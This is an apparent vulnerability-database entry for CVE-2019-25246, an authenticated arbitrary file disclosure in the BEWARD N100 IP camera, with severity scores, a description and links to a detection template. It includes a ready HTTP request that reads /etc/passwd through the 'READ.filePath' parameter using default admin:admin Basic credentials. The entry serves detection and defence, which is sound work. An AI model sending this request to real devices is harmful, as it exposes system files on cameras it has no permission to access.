🔙 목록으로 돌아가기

CVE-2019-25246: BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure

TitleBEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure
Authorgeeknik,liangtovi-debug
SeverityHigh
ImpactAuthenticated attackers can read sensitive system files, potentially exposing critical information.
RemediationUpdate to the latest version or apply vendor patches addressing this vulnerability
CVSS Score8.6
EPSS Score0.10281
CVE IDCVE-2019-25246
CWE IDCWE-22,CWE-73
Tags cve cve2019 iot camera disclosure edb vuln

🔍 Vulnerability Description

Beward N100 H.264 VGA IP Camera M2.1.6 contains an authenticated file disclosure vulnerability caused by improper validation of the ‘READ.filePath’ parameter in fileread script and SendCGICMD API, letting authenticated attackers read arbitrary system files.

🌐 HTTP Request

GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-25246.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-25246.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A